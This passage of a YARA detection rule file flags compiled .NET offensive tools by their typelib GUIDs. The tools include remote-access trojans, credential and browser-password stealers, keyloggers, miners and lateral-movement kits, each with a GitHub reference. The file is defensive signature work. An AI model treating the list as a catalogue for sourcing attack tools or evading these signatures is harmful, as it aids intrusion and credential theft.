"2020-12-28" strings: $typelibguid0 = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2019_1064 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RythmStick/CVE-2019-1064" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Tokenvator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/Tokenvator" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WheresMyImplant { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/WheresMyImplant" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Naga { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/byt3bl33d3r/Naga" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii nocase wide $typelibguid1 = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBox { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/P1CKLES/SharpBox" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "616c1afb-2944-42ed-9951-bf435cadb600" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_rundotnetdll32 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/rundotnetdll32" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AntiDebug { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/AntiDebug" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "997265c1-1342-4d44-aded-67964a32f859" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvisibleRegistry { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NVISO-BE/DInvisibleRegistry" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TikiTorch { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/TikiTorch" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii nocase wide $typelibguid1 = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii nocase wide $typelibguid2 = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii nocase wide $typelibguid3 = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii nocase wide $typelibguid4 = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii nocase wide $typelibguid5 = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii nocase wide $typelibguid6 = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HiveJack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Viralmaniar/HiveJack" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DecryptAutoLogon { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/securesean/DecryptAutoLogon" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UnstoppableService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/UnstoppableService" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWMI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpWMI" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EWSToolkit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/EWSToolkit" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SweetPotato { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/CCob/SweetPotato" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii nocase wide $typelibguid1 = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_memscan { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/memscan" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "79462f87-8418-4834-9356-8c11e44ce189" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpStay { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpStay" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLocker { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Pickfordmatt/SharpLocker" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SauronEye { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/vivami/SauronEye" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii nocase wide $typelibguid1 = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_sitrep { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/sitrep" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "12963497-988f-46c0-9212-28b4b2b1831b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpClipboard { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/SharpClipboard" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "97484211-4726-4129-86aa-ae01d17690be" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCookieMonster { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/m0rv4i/SharpCookieMonster" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_p0wnedShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Cn33liz/p0wnedShell" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2e9b1462-f47c-48ca-9d85-004493892381" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMove { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpMove" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_C_Sharp_R_A_T_Client { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpPrinter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpPrinter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EvilFOCA { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ElevenPaths/EvilFOCA" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoshC2_Misc { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nettitude/PoshC2_Misc" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii nocase wide $typelibguid1 = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharpire { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/Sharpire" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "39b75120-07fe-4833-a02e-579ff8b68331" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_SMBExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Sharp-SMBExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MiscTools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/MiscTools" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii nocase wide $typelibguid1 = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii nocase wide $typelibguid2 = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii nocase wide $typelibguid3 = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii nocase wide $typelibguid4 = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MemoryMapper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jasondrawdy/MemoryMapper" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_VanillaRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/DannyTheSloth/VanillaRAT" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii nocase wide $typelibguid1 = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UnmanagedPowerShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/leechristensen/UnmanagedPowerShell" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Quasar { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/quasar/Quasar" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii nocase wide $typelibguid1 = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAdidnsdump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/b4rtik/SharpAdidnsdump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetToJScript { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/DotNetToJScript" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Inferno { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/Inferno" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSearch { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpSearch" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSecDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/G0ldenGunSec/SharpSecDump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Net_GPPPassword { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/outflanknl/Net-GPPPassword" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_FileSearcher { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NVISO-BE/FileSearcher" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ADFSDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fireeye/ADFSDump" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpRDP { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xthirteen/SharpRDP" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCall { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jhalon/SharpCall" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ysoserial_net { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/pwntester/ysoserial.net" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii nocase wide $typelibguid1 = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ManagedInjection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malcomvetter/ManagedInjection" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii nocase wide $typelibguid1 = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii nocase wide $typelibguid2 = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSocks { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nettitude/SharpSocks" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii nocase wide $typelibguid1 = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_WMIExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Sharp-WMIExec" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_KeeThief { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/KeeThief" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid1 = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii nocase wide $typelibguid3 = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii nocase wide $typelibguid4 = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii nocase wide $typelibguid5 = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii nocase wide $typelibguid6 = "94432a8e-3e06-4776-b9b2-3684a62bb96a" ascii nocase wide $typelibguid7 = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_fakelogonscreen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/bitsadmin/fakelogonscreen" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d35a55bd-3189-498b-b72f-dc798172e505" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoshSecFramework { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/PoshSec/PoshSecFramework" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii nocase wide $typelibguid1 = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAttack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jaredhaight/SharpAttack" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Altman { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/keepwn/Altman" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "64cdcd2b-7356-4079-af78-e22210e66154" ascii nocase wide $typelibguid1 = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii nocase wide $typelibguid2 = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii nocase wide $typelibguid3 = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii nocase wide $typelibguid4 = "9514574d-6819-44f2-affa-6158ac1143b3" ascii nocase wide $typelibguid5 = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii nocase wide $typelibguid6 = "9624b72e-9702-4d78-995b-164254328151" ascii nocase wide $typelibguid7 = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii nocase wide $typelibguid8 = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii nocase wide $typelibguid9 = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii nocase wide $typelibguid10 = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii nocase wide $typelibguid11 = "231987a1-ea32-4087-8963-2322338f16f6" ascii nocase wide $typelibguid12 = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii nocase wide $typelibguid13 = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii nocase wide $typelibguid14 = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii nocase wide $typelibguid15 = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii nocase wide $typelibguid16 = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii nocase wide $typelibguid17 = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BrowserPass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jabiel/BrowserPass" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Mythic { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/its-a-feature/Mythic" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii nocase wide $typelibguid1 = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Nuages { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/p3nt4/Nuages" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSniper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HunnicCyber/SharpSniper" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHound3 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BloodHoundAD/SharpHound3" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "a517a8de-5834-411d-abda-2d0e1766539c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BlockEtw { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Soledge/BlockEtw" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWifiGrabber { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/SharpWifiGrabber" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMapExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cube0x0/SharpMapExec" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_k8fly { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/zzwlpx/k8fly" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stealer { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malwares/Stealer" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii nocase wide $typelibguid1 = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii nocase wide $typelibguid2 = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PortTran { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/k8gege/PortTran" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii nocase wide $typelibguid1 = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_gray_keylogger_2 { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/graysuit/gray-keylogger-2" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii nocase wide $typelibguid1 = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_Miner { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Miner" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BlackNET { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/BlackHacker511/BlackNET" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii nocase wide $typelibguid1 = 